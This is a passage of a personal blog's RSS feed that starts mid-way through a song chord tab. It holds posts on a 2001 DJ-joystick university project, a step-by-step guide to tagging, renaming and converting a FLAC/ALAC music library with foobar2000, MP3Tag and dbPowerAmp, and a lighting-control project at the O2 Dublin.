<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">s</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">change them to gol</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">d</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">change them to g</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">old</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">I said change the</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">m to gold</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">change them to go</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">ld&#8230;.</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
<div class="cnl">
<div class="chord"><strong></strong>&nbsp;</div>
<div class="lyric"></div>
</div>
<div class="cnl">
<div class="chord"><strong>Em</strong>&nbsp;</div>
<div class="lyric">ooooo</div>
</div>
<div class="cnl">
<div class="chord"><strong>C</strong>&nbsp;</div>
<div class="lyric">oold</div>
</div>
</div>
<div class='cnl_clear'></div>
<div class="cnl_line">
</div>
<div class='cnl_clear'></div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/music/tab/carolines-spine-sullivan-acoustic/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DigitalVinyl 2001</title>
		<link>http://www.jonnypayne.com/index.php/ubergeeking/digitalvinyl-2001/</link>
		<comments>http://www.jonnypayne.com/index.php/ubergeeking/digitalvinyl-2001/#comments</comments>
		<pubDate>Fri, 18 Mar 2011 18:41:10 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[UberGeeking]]></category>

		<guid isPermaLink="false">http://www.jonnypayne.com/?p=153</guid>
		<description><![CDATA[I chose to emulate a pair of turntables as realistically as possible. Although this has been done before nobody has done it quite like this - especially back in 2001]]></description>
			<content:encoded><![CDATA[<p><span class="Apple-style-span" style="font-size: 14px; font-weight: bold; ">10 years have passed since my university days.&nbsp;</span></p>
<div><img alt="" src="http://www.jonnypayne.com/wp-content/uploads/image/controls.jpg" style="float: right; width: 204px; height: 143px; " /></div>
<div>&nbsp;</div>
<div>10 years of mistakes, regrets, master strokes and epic fails. Well, in the words of my favourite security guard, I&#39;ll &quot;chalk it up&quot; to experience, and treasure the value of that experience in later life.</div>
<div>&nbsp;</div>
<div>As far as memories go, what do I want to remember from 10 years ago? My pet project, my university final project. It drummed up the interest of investment angels and could have been the start of an amazing future with my own company, building crazy musical devices. Frankly, that would have been great!</div>
<div>&nbsp;</div>
<div>Unfortunately I was in a rather bohemian state of mind at the time, being 21, and simply wanted to go and have a good time, so I pretty much threw it all away. Decided not to meet with the angels, and &quot;opted out&quot;. I simply wasn&#39;t prepared to take on that level of responsibility &#8211; which is probably one of my biggest mistakes.</div>
<div>&nbsp;</div>
<p><span id="more-153"></span></p>
<h3>So&#8230;.how can I redress this balance? I can&#39;t.&nbsp;</h3>
<div>&nbsp;</div>
<div>What I <strong>can</strong> do is mark the 10 year anniversary of this little baby by recording her for posterity, before ripping out her guts and totally rebuilding her insides!</div>
<div>&nbsp;</div>
<div>She&#8230;..is a DJing joystick, with matching custom software called DigitalVinyl. Original eh?</div>
<div>&nbsp;</div>
<div>From this point on is an almost exact reproduction of my old website page detailing my final project.</div>
<div>&nbsp;</div>
<div>In a post to follow are my plans for rejuvenating it into a full USB MIDI interface to control any of the latest DJing softwares &nbsp;(Traktor comes to mind first and foremost). That post will come in a week or so&#8230;..</div>
<div>&nbsp;</div>
<div>Checkit Rude Bway!</div>
<div>&nbsp;</div>
<div>
<hr />
<h3>This was my Final Project for my BSc Hons in <strong>Software Systems For The Arts and Media</strong></h3>
<div>The brief for this project was simple. It had to be validly located inside the scope of the course. Which covers hardware/software/interfacing/human computer interaction/graphic design/animation&#8230;&#8230;&#8230;limited only by the course title.</div>
<div>&nbsp;</div>
<div>I chose to emulate a pair of turntables as realistically as possible. Although this has been done before nobody has done it quite like this &#8211; especially back in 2001 &#8211; and I also had the benefit of being a geek with a number of years of coding, and an HND in software engineering under my belt.</div>
<div>&nbsp;</div>
<div>The project workload was huge, well, far bigger than expected. I can&#39;t tell you all the things I had in mind for it because I&#39;d have to kill you. Needless to say, to my bitter regret, sacrifices and adaptations had to be employed.</div>
<div>&nbsp;</div>
<div>What did i get done?:</div>
<div>&nbsp;</div>
<div>Joystick:</div>
<div>&nbsp;</div>
<div>Fully completed, Fully working ;-&gt; (bo! badabye now, outherewitharinsinsound)</div>
<div>&nbsp;</div>
<div style="text-align: center; "><a href="http://www.jonnypayne.com/wp-content/uploads/2011/03/controls2.jpg"><img alt="Interface Controller" class="aligncenter size-medium wp-image-161" height="209" src="http://www.jonnypayne.com/wp-content/uploads/2011/03/controls2-300x209.jpg" title="Interface Controller" width="300" /></a></div>
<div>&nbsp;</div>
<div>Software:</div>
<div>&nbsp;</div>
<div>Graphic Design stage 1 completed (enough for a sexy basic mixer interface)</div>
<div>&nbsp;</div>
<div style="text-align: center; "><a href="http://www.jonnypayne.com/wp-content/uploads/2011/03/digital-vinyl.jpg"><img alt="Software Interface" class="size-medium wp-image-160" height="225" src="http://www.jonnypayne.com/wp-content/uploads/2011/03/digital-vinyl-300x225.jpg" title="Software Interface" width="300" /></a></div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>2 independent turntables, with animated records, each with a playlist for up to 500 MP3 files (no reason why i stopped at 500, i just did)</div>
<div>&nbsp;</div>
<div>Each turntable has a play frequency of 100Hz &gt; 100,000HZ (latency 30ms), a volume, pan and BPM setting (BPM is calculated from a 44100hz reference point and altered by the play frequency) all with same latency. Good ol&#39; directsound.</div>
<div>&nbsp;</div>
<div>Entire software is controlled by the joystick alone. turntable&#39;s frequency is adjustable via 7&quot; record on joystick, in a scratching manner.</div>
<div>&nbsp;</div>
<div>No real scratching yet. you can scratch forwards real nice, but I had some trouble working the scratch code into the directsound buffer engine, methinks its a delphi speed thing (im used to Pascal with embedded ASM in DOS). Instead pulling back slows the track a bit as if dragging your fingers over the turntable edge.</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>For those that like stats:</div>
<div>&nbsp;</div>
<div>Graphic engine 60fps on AMD K6-2 500 with TNT2 (DirectDraw)</div>
<div>&nbsp;</div>
<div>Audio Engine using 8% of resources live&#8230;&#8230;..;-&gt;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>Behold the beauty of the fully-working prototype joystick. I built it myself, using a carefully balanced mixture of MDF, Mixer components, A2D convertor, Technics lego and a PS/2 Mouse. And about 12 buckets of blood, sweat and tears.</div>
<div>&nbsp;</div>
<div style="text-align: center; "><a href="http://www.jonnypayne.com/wp-content/uploads/2011/03/construction1.jpg"><img alt="Joystick Construction" class="aligncenter size-medium wp-image-164" height="213" src="http://www.jonnypayne.com/wp-content/uploads/2011/03/construction1-300x213.jpg" title="Joystick Construction" width="300" /></a></div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>This project was selected by my course tutors for inclusion in the University of Herts New Designers Exhibition stand in 2001.</div>
<div>&nbsp;</div>
<div>Below is a photo of (a very young looking) me, DJ CrispyFlow ( or whatever, Widowmaker, Bigboy Smalls, Judge Judy etc.) mixin&#39; it up and blowin peoples minds at the 5 day exhibition in Islington, London! Rewind&#8230;&#8230;.</div>
<div>&nbsp;</div>
<div><a href="http://www.jonnypayne.com/wp-content/uploads/2011/03/DJPIC.jpg"><img alt="DJ Jon Mixing Badly" class="aligncenter size-medium wp-image-162" height="225" src="http://www.jonnypayne.com/wp-content/uploads/2011/03/DJPIC-300x225.jpg" title="DJ Jon Mixing Badly" width="300" /></a></div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>UPDATE:</div>
<div>Not only does the software work in windows 7 without any mods (!!!!!!) it works better than it did on windows XP!!! But I have given up on the software part. Why reinvent the wheels of steel?</div>
<div>&nbsp;</div>
<div>The new plan &#8211; is to turn my joystick into a fully functional USB MIDI traktor&nbsp;controller&#8230;&#8230; Watch this space for progress!!!</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/ubergeeking/digitalvinyl-2001/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>High Fidelity &#8211; 2011 &#8211; The Digital Rebellion</title>
		<link>http://www.jonnypayne.com/index.php/musings/high-fidelity-2011-the-digital-rebellion/</link>
		<comments>http://www.jonnypayne.com/index.php/musings/high-fidelity-2011-the-digital-rebellion/#comments</comments>
		<pubDate>Sat, 11 Dec 2010 10:14:16 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Music]]></category>
		<category><![CDATA[Musings]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[flac]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[lossless]]></category>
		<category><![CDATA[music]]></category>

		<guid isPermaLink="false">http://www.jonnypayne.com/?p=118</guid>
		<description><![CDATA[&#160; High Fidelity.&#160; &#160; Great Movie. &#160; But even more importantly many of us could identify directly with the characters in the movie. &#160; I have a friend who is a hybrid between Jack Black&#39;s character (&#34;Barry&#34;) and John Cusack&#39;s (&#34;Rob&#34;). He works in a very well known independent record store and has done for [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p><span class="Apple-style-span" style="font-size: 24px; font-weight: bold; ">High Fidelity.&nbsp;</span></p>
<div>&nbsp;</div>
<h3>Great Movie.</h3>
<div>&nbsp;</div>
<div>But even more importantly many of us could identify directly with the characters in the movie.</div>
<div>&nbsp;</div>
<div>I have a friend who is a hybrid between Jack Black&#39;s character (&quot;Barry&quot;) and John Cusack&#39;s (&quot;Rob&quot;). He works in a very well known independent record store and has done for many years; Through my formative years he has shaped my musical tastes in many ways by religiously producing excellent mix tapes which formed the majority of my vehicular audio accompaniments at university&#8230;.</div>
<div>&nbsp;</div>
<div><a href="http://www.jonnypayne.com/wp-content/uploads/2010/12/highfid2.jpg"><img alt="" class="alignright size-full wp-image-137" height="163" src="http://www.jonnypayne.com/wp-content/uploads/2010/12/highfid2.jpg" title="highfid" width="250" /></a></div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>Happy days&#8230;..</div>
<div>&nbsp;</div>
<div>But Tapes are gone now&#8230;..and so is Vinyl&#8230;&#8230;CD&#39;s will be next. So I have decided to solve the conundrum faced by Rob and Dick about organising your record collection. Chronological? Alphabetical?</div>
<div>&nbsp;</div>
<address>Autobiographical?</address>
<div>&nbsp;</div>
<div>None of the above. CD&#39;s are dead, baby &#8211; its all about lossless FLACs these days.</div>
<p><span id="more-118"></span></p>
<div>&nbsp;</div>
<h2>Formats</h2>
<div>So Why Lossless FLACS? &nbsp;</div>
<div>&nbsp;</div>
<ol>
<li>You cant scratch them</li>
<li>They never wear out</li>
<li>They never get dusty</li>
<li>You can TAG them (see below!)</li>
<li>You can embed cover art into them</li>
<li>You can carry them in your pocket on your iphone/ipod/rockbox/zune&#8230;&#8230;blah blah</li>
<li>You can make perfect backup copies of the files to another HD in a matter of seconds</li>
<li>You can STREAM them around your home.</li>
<li>You can turn them into a sacrifical car CD in seconds</li>
<li>They are the same quality as the CD / DVDA they were ripped from!</li>
</ol>
<div>&nbsp;</div>
<div>Point 4) also solves Rob and Dicks organisation conundrum.&nbsp;</div>
<div>&nbsp;</div>
<div>Tag them well&#8230;.and you can immediately flip between Chronological or Alphabetical! With a little more work, you can add custom tags to each album to enable Autobiographical sorting! And then flip between them at your own whim.</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div><strong>DISCLAIMER</strong></div>
<div>You dont have to use FLACs. I detail alternatives here:</div>
<div>&nbsp;</div>
<ul>
<li>ALAC (Apple Lossless &#8211; my particular format of choice becasue its compatible with itunes (FLACs are not &#8211; at least on PC anyway)</li>
<li>APE (Monkey&#39;s Audio)</li>
<li>WAVPAck</li>
<li>OptimFROG</li>
<li>Real Audio Lossless</li>
<li>Shorten</li>
<li>The True Audio <span class="Apple-tab-span" style="white-space:pre"> </span>Open source [.tta]</li>
<li>WMA Lossless</li>
</ul>
<div>&nbsp;</div>
<div>But to be honest &#8211; while some of these formats may be techncially better (in a betamax way) the only real choice you face is -&gt; ALAC or FLAC (FLAC is vhs, ALAC is Apple VHS).</div>
<div>&nbsp;</div>
<h2>Lossless</h2>
<div>&nbsp;</div>
<div>Don&#39;t be confused by my VHS / Betamax analogy &#8211; the Quality is not the issue here. All of these formats are totally Lossless.</div>
<div>&nbsp;</div>
<div>They do not degrade the audio in any way. You can convert from FLAC, into APE, into ALAC, into OptimFrog a thousand times and the audio which comes out the end is IDENTICAL (assuming the transcode worked properly!). It is Lossless. It is the same quality as the optical media is was ripped from. That includes DVD Audio! Flacs and ALACs support 24bit 96Khz too!!!</div>
<div>&nbsp;</div>
<div><em>So why VHS / Betamax?</em></div>
<div>&nbsp;</div>
<div>Well, functionality changes between formats, most importantly compatibility changes.</div>
<div>&nbsp;</div>
<div><img alt="FLAC" class="alignright size-full wp-image-134" height="53" src="http://www.jonnypayne.com/wp-content/uploads/2010/12/flacsml1.jpg" title="flacsml" width="100" /></div>
<div>&nbsp;</div>
<div>FLAC is the most compatible, at the moment. If you don&#39;t use Apple products stick with FLAC. It&#39;ll play on almost any device which supports lossless media files. It&#39;s open source, and most likely to exist in 15 years time (assuming its UGLY logo doesnt send it the same route as the catchily titled (HD-DVD). It is to Lossless, what VHS was to hometaping. (FLAC file extensions are *.flac). It does need an image overhaul.</div>
<div>&nbsp;</div>
<div><img alt="Apple" class="alignright size-full wp-image-135" height="121" src="http://www.jonnypayne.com/wp-content/uploads/2010/12/applesml1.jpg" title="applesml" width="100" /></div>
<div>&nbsp;</div>
<div>If you use Itunes, then you&#39;re best bet is actually using ALAC. It&#39;s also going to exist in 15 years time due to Apple-weight, but it won&#39;t play natively on a lot of third party mobile devices. If your mobile devices are Apple ones, this doesnt matter. ALAC is stored in an MPEG 4 container file with an extension of *.m4a, but dont be confused becasue apples lossy format (AAC)is also stored in the same container format (*.m4a). The only wayto be sure is to open the M4a file up in itunes, or VLC media player, or foobar with the ALAC decoder installed and check what format it is. You can also usually tell by the filesize. Lossless files are considerably bigger than Lossy files of the same length.</div>
<div>&nbsp;</div>
<div>Both formats support tagging and embedded cover art.</div>
<div>&nbsp;</div>
<div>And thats all you need to know. My instructions below stand for both FLAC and ALAC, all you need to do is ignore the final step if you want to stick with FLACs.</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<h2>Anality</h2>
<div>&nbsp;</div>
<div>Yes, you still need to be Anal. You still get the fun of managing your record collection details. But its much quicker, and easier to be anal these days.</div>
<div>&nbsp;</div>
<div>These are my settings, but I think you&#39;ll like them. If you don&#39;t know if you like them, go with them, because on the most part, they will work for you.</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<h2>Software</h2>
<div>&nbsp;</div>
<div><strong>Foobar 2000 :</strong> Free software available <a href="http://www.foobar2000.org/download" target="_blank">here</a>.</div>
<div><strong>MP3Tag :</strong> Free software available <a href="http://www.mp3tag.de/en/download.html" target="_blank">here</a>.</div>
<div><strong>DBPowerAmp</strong>:&nbsp;If you want to go ALAC you&#39;ll also want DBPowerAmp which is not free &#8211; get it <a href="http://www.dbpoweramp.com/dmc-power-register.htm" target="_blank">here</a>.</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>If you get the cheap license, you&#39;ll only be able to utilise a single core for ALAC encoding. On A quad core CPU that means you&#39;ll be transcoding at 25% of full speed. The 38 dollar license is very very fast and also provides you with commercial quality CD ripping functionality.</div>
<div>&nbsp;</div>
<div><strong>Apple Skinflint</strong></div>
<div>&nbsp;</div>
<div>There is a free method of using itunes to encode ALAC from within Foobar for free, but it is much slower than DBPowerAmp&#39;s custom ALAC encoder solution &#8211; if you are tempted by the cheaper version of DBPoweramp then it might also be worth looking at if you are particularly geeky &#8211; but it IS a geeky (and slightly complicated solution). It is also not as fully functional as DBPOweramp (you can&#39;t embed folder art in the files, which adds a folder art step after importing to itunes). Not recommended unless you are a tight-fisted ubergeek.</div>
<div>&nbsp;</div>
<div>QAAC is also available for Foobar for free but I found it to be very, very buggy, and crashes a huge amount, in its current implemenation at time of writing. Not recommended _yet_. You can use it with a single core override hack apparently &#8211; this fixes the crashes for most people. Either way for 20-odd british nuggets my time <strong>is</strong> money. I paid the guys.</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<h1>1) Folders</h1>
<div><strong>Software:</strong> None, use your OS. Clever ones among you can automate this with foobar but I do it manually as I collate and rip so no need.</div>
<div>&nbsp;</div>
<div>It should be &nbsp;Artist\Album (YEAR)</div>
<div>&nbsp;</div>
<div>The foobar script would be:</div>
<div>
<pre class="qoate-code">%album artist%\%Album%[&#39; (&#39;%date%&#39;)&#39;]\</pre>
</div>
<div>&nbsp;</div>
<div>Drop all the FLAC songs for each album into the relevant folder &#8211; for example:&nbsp;</div>
<div>&nbsp;</div>
<div>
<pre class="qoate-code">D:\Foo Fighters\Nothing Left To Lose (1999)</pre>
</div>
<div>&nbsp;</div>
<div>Also drop all your cover art and inlay art in here, and indeed anything else &#8211; riplogs, whatever. Just pop it all right in there.</div>
<div>&nbsp;</div>
<div>____________________________________________________________________________________</div>
<div>If the songs arent in FLAC format, the you will need to setup a convert script:</div>
<div>right click one the files in the Foobar Playlist. Choose Convert &gt; &#8230;</div>
<div>Output format should be FLAC &gt; Level 5, bitrate should be set to Auto, and dither to Never.</div>
<div>Destination should be set to source track fodler, skip if file already exists, and convert each track toan individual file.</div>
<div>For the name format use:</div>
<div>
<pre class="qoate-code">[%discnumber%.]%tracknumber%. %title%[&#39; (&#39;%artist%&#39; - &#39;%album%&#39;)&#39;][&#39; (&#39;%trackartist%&#39;)&#39;]</pre>
</div>
<div>Processing should be set to none and other should be set to none.</div>
<div>*** ONLY CONVERT TO FLAC IF THE SOURCE FILES ARE LOSSLESS ***</div>
<div>___________________________________________________________________________________</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<h1>2) Tagging.</h1>
<div><strong>Software:</strong> Foobar 2000</div>
<div>&nbsp;</div>
<div>Essential Tags:</div>
<ul>
<li>Artist (For compilations I recommend you use &quot;Various&quot; or &quot;OST&quot; for soundtracks)</li>
<li>Album</li>
<li>Date (Just the YEAR is best!)</li>
<li>Track</li>
<li>Track No</li>
<li>(Track artist should also be used if it is a compilation)</li>
<li>Disc no if more than one disc in album</li>
<li>Disc Total if more than one disc in album</li>
<li>Genre</li>
</ul>
<div>&nbsp;</div>
<div>Get them right. They are ESSENTIAL. We will automatically rename the files based on these tags &#8211; so they MUST BE CORRECT before the rename!!!!</div>
<div>&nbsp;</div>
<div>Note on Genre&#39;s : There are millions of possibilities, but try and keep them simple, make some rules, give yourself a list of 20 maximum and stick to them. Keep them handy to refer to. You can change them at will at any point in the future.</div>
<div>&nbsp;</div>
<h1>3) Cover art.</h1>
<div>&nbsp;</div>
<div>At the very least create a cover.jpg (or folder.jpg) and put it in album folder. Its up to you, but I recommend it to be 500&#215;500 as it will be inserted directly into every audio file (for itunes!). Just big enough to give enough detail to stand the test of time, but small enough not to bloat. If you don&#39;t like that then go for 1000&#215;1000. Anything more is silly, but keep the big originals in the same folder for the future. Add anything else you want to this folder, inlays, traybacks, whatever.</div>
<div>&nbsp;</div>
<h1>4) Renaming the files</h1>
<div><strong>Software:</strong>&nbsp;Foobar 2000</div>
<div>&nbsp;</div>
<div>Right click on a file in the playlist, and select File Operations &gt; Rename to&gt; and then &#8230;</div>
<div>For operation type select &quot;rename&quot;.</div>
<div>&nbsp;</div>
<div>Then paste the following into your Filename Pattern box :</div>
<div>
<pre class="qoate-code">[%discnumber%.]%tracknumber%. %title%[&#39; (&#39;%artist%&#39; - &#39;%album%&#39;)&#39;][&#39; (&#39;%trackartist%&#39;)&#39;]</pre>
</div>
<div>This script works with multidisc albums, and compilations as well.</div>
<div>&nbsp;</div>
<div>Type your custom name in the Preset box (something like &quot;Jon&#39;s AutoRename&quot;.), and hit Save.</div>
<div>&nbsp;</div>
<div>You can now add your entire audio library into the playlist in foobar, and autorename all of the files in one hit by selecting them all, right clicking and choosing File Operations &gt; Rename To &gt; Jon&#39;s Autorename.</div>
<div>&nbsp;</div>
<div><a href="http://www.jonnypayne.com/wp-content/uploads/2010/12/explorer1.jpg"><img alt="" class="alignright size-thumbnail wp-image-136" height="150" src="http://www.jonnypayne.com/wp-content/uploads/2010/12/explorer1-150x150.jpg" title="Explorer" width="150" /></a></div>
<div>&nbsp;</div>
<div>Now your files will all pop up in the correct order in windows Explorer, and they are all very well named. This can be useful in the future, although with proper tagging the filename is less important. Do it anyway!&nbsp;</div>
<div>&nbsp;</div>
<div>* Beware the power of this tool after you have imported files into an audio management application like itunes &#8211; if you batch rename everything after importing it &#8211; you&#39;ll end up with the application unable to find the files! *</div>
<div>&nbsp;</div>
<h1>5) Importing cover images</h1>
<div><strong>Software:</strong> MP3Tag</div>
<div>&nbsp;</div>
<div>Assuming you have done step 3 properly this will be a pretty quick process &nbsp;- only a second or two per song.</div>
<div>&nbsp;</div>
<div>Run the program, then use it to find your music folder (which should now be full of flac files), Select all of your files, find the quick button (the small square buttons below the file menu) for &quot;Actions (quick)&quot;. Click it and choose &quot;Insert cover art&quot;.</div>
<div>&nbsp;</div>
<div>When asked use the filename you have created in each album folder (&quot;cover.jpg&quot; or &quot;folder.jpg&quot;), or a combination of the two for those who are more adventurous.</div>
<div>&nbsp;</div>
<div>This will take some time but will automatically embed the images into the FLAC files. Itunes will like this, as will most music players.</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<div>SO you now have a perfect FLAC archive. Its tagged, its got embedded covers, its all well named, and its all lossless.</div>
<div>&nbsp;</div>
<div>You can now choose your playback device solution. If you arent using iTunes, step away from the tools &#8211; you&#39;re done!</div>
<div>&nbsp;</div>
<div>Otherwise move on to step 6&#8230;..</div>
<div>&nbsp;</div>
<div>&nbsp;</div>
<h1>6) Transcode the lot to ALAC</h1>
<div><strong>Software:</strong> DBPoweramp</div>
<div>&nbsp;</div>
<div>Run DBPowerAmp Batch Converter.</div>
<div>This software will keep tags AND embedded media and is much faster than QAAC or ItunesEncode in foobar. Plus it&#39;s much more stable, and can auto-verify your transcodes.</div>
<div>&nbsp;</div>
<div>Find your audio folder and tick the toplevel directory, and ensure your entire folder is going to be processed.</div>
<div>Hit the convert icon.</div>
<div>&nbsp;</div>
<div>On the window that pops up select converting To &gt; Apple Lossless.</div>
<div>Tick &quot;After encoding Verify Audio&quot;.</div>
<div>Output folder can be &quot;Original Folder&quot;.</div>
<div>The smarter ones among you will be able to configure it to move problematic items into an &quot;error&quot; subfolder. I&#39;ll leave you to find your way for that bit, its dead easy&#8230;. (hint &gt; Add button)</div>
<div>&nbsp;</div>
<div>Hit Convert.</div>
<div>&nbsp;</div>
<div>IT will go away and do its thing. This bit takes time. Lots of it &#8211; around 30 seconds per song depending on your CPU power.</div>
<div>&nbsp;</div>
<div>Any errors along the will be logged and highlighted for you at the end.</div>
<div>&nbsp;</div>
<div>Wait&#8230;..</div>
<div>&nbsp;</div>
<div>No errors? Good. Those M4A files are now your verified master files and you can delete the flacs. search the entire folder for *.flac, and delete them. That&#39;s it &#8211; done.</div>
<div>&nbsp;</div>
<div>You can literally just add the folder to itunes now &#8211; all covers will be correct and tags correct too. You&#39;re away!!!</div>
<div>&nbsp;</div>
<div>Remember to untick &quot;Let itunes manage my files&quot; otherwise it will undo all of your good filenaming. Alternatively you can leave this ticked and let itunes do it for you &#8211; its really your choice.</div>
<div>&nbsp;</div>
<div>This is a totally reversible process so you can put them back into flacs in the future if you really want.</div>
<div>&nbsp;</div>
<h2>Thats it. &nbsp;Go listen to your top end audio files.</h2>
<div>&nbsp;</div>
<div>In the next installment I will cover ripping tracks from an audio CD, to 99.9999% accuracy. This is not easy to achieve, but it is worth it.</div>
<div>&nbsp;</div>
<div>See you next time!&nbsp;</div>
<div>&nbsp;</div>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/musings/high-fidelity-2011-the-digital-rebellion/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>The O2, and beyond</title>
		<link>http://www.jonnypayne.com/index.php/musings/the-o2-and-beyond/</link>
		<comments>http://www.jonnypayne.com/index.php/musings/the-o2-and-beyond/#comments</comments>
		<pubDate>Wed, 29 Sep 2010 11:09:25 +0000</pubDate>
		<dc:creator>Jon Payne</dc:creator>
				<category><![CDATA[Musings]]></category>
		<category><![CDATA[o2]]></category>
		<category><![CDATA[project]]></category>
		<category><![CDATA[work]]></category>

		<guid isPermaLink="false">http://www.jonnypayne.com/?p=74</guid>
		<description><![CDATA[It&#8217;s been a while since I&#8217;ve done any updates so I thought it would be a good idea to post what I&#8217;ve been up to for the past 3 years. First up is this: The link is quoted at the bottom in case the news item disappears in the future. The O2 in dublin; Everything [...]]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste">It&#8217;s been a while since I&#8217;ve done any updates so I thought it would be a good idea to post what I&#8217;ve been up to for the past 3 years.</div>
<div id="_mcePaste">
<p>First up is <a href="http://edmundson-electrical.voltilink.co.uk/newsref/14300/infopro.tradeassoc.brand/knx-solution-at-the-o2-dublin-sets-new-standards.html&amp;utm_source=newsletter&amp;utm_medium=email&amp;utm_campaign=VoltiNEWS-3-270910" target="_blank">this</a>:</p>
<div id="attachment_75" class="wp-caption alignright" style="width: 310px"><a href="http://www.jonnypayne.com/wp-content/uploads/2010/09/theo2dublin.jpg"><img class="size-medium wp-image-75" title="The O2, Dublin" src="http://www.jonnypayne.com/wp-content/uploads/2010/09/theo2dublin-300x225.jpg" alt="" width="300" height="225" /></a>
<p class="wp-caption-text">The O2, Dublin</p>
</div>
</div>
<p>The link is quoted at the bottom in case the news item disappears in the future.</p>
<p>The O2 in dublin; Everything in the attached write up is accurate &#8211; my role was project manager of the project, which included the majority of design works, (supported by a small but skilled engineering team).</p>
<p>It was enormously complicated, the most complicated lighting control job we&#8217;ve  (Andromeda Telematics) done in our 10 year history. We did manage to finish it in 5 months, and it has been a very successful project. It was also my first project as a manager, so it was a great result.</p>
<p>I&#8217;m currently doing a much bigger project (6 times bigger) &#8211; Dublin Airport Terminal 2, which is nearing completion after 2 years. I&#8217;ll post another one when it&#8217;s finished!</p>
<blockquote>
<div id="_mcePaste">KNX solution at the O2 Dublin sets new standards</div>
<div id="_mcePaste">KNX UK Association member Andromeda Telematics (ATL) was shortlisted in the KNX International Awards presented at the 2010 Light+Building Exhibition in Frankfurt for the company&#8217;s O2 project in Dublin. It is a showcase of progressive design and building services providiing an integrated control solution for the renovation, delivering innovative KNX/DALI colour change functionality as well as an emergency lighting test system.</div>
<div id="_mcePaste">With an entertainment venue of this scale safety was also paramount, with lighting control signalling exits and providing emergency lighting.  It was also important to create a perception of the venue as energy-conscious and this was achieved using  sustainable KNX design.</div>
<div id="_mcePaste">Cutting edge building services were integral to the relaunch of the O2 with lighting playing a major role and lighting control being utilised in a practical sense.  Pre-show, interval and post-show lighting scenes help to create structure for shows and lighting in facilities such as the toilets, front of house and bars is key.</div>
<div id="_mcePaste">The KNX/DALI solution includes building-wide lighting scene control for public areas, controllable via local touch screens and a central headend.  There is also local scene set control and dimming in the private bar areas, as well as local control in all back-of-house areas for override of lighting condition.</div>
<div id="_mcePaste">The external lighting controls feature lux sensors which activate lighting automatically at dusk.  Vitally, an override function is available for periods where the building is unoccupied, such as holidays.  The building’s facade features colour change sequencing and pattern selection through DALI.  Similarly, the auditorium itself features colourised lightscapes, with colour change fittings and high power dimming combinations, with a portable touch screen controller.</div>
<div id="_mcePaste">Through this complex solution, ATL has provided a customised global control system, offering the ability to alter lighting states throughout the building.  The system delivers the capabilities to create individualised lighting scenes for each show both on the facade and in the auditorium, creating varying ambience and enhancing the customer experience as desired.</div>
<div id="_mcePaste">The solution also has the ‘green’ credentials and the KNX technology used for the project itself provides energy-savings through reduced cabling, and the robust and reliant nature of the protocol reduces maintenance costs.  The lighting control strategy undertaken has also proven to reduce energy consumption by up to 60%, with presence detection and lux sensors meaning that lighting is only active when required.</div>
<div id="_mcePaste">The time-scale in which the project needed to be completed was also particularly challenging as there was only a five month period from delivery of first panel to site to the completion of commissioning.  The project represented important steps both for ATL and the KNX community as a whole with  ATL taking DALI colour change capabilities to a new level of functionality.</div>
</blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.jonnypayne.com/index.php/musings/the-o2-and-beyond/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>To WiFi or not to WiFi, that is the question</title>
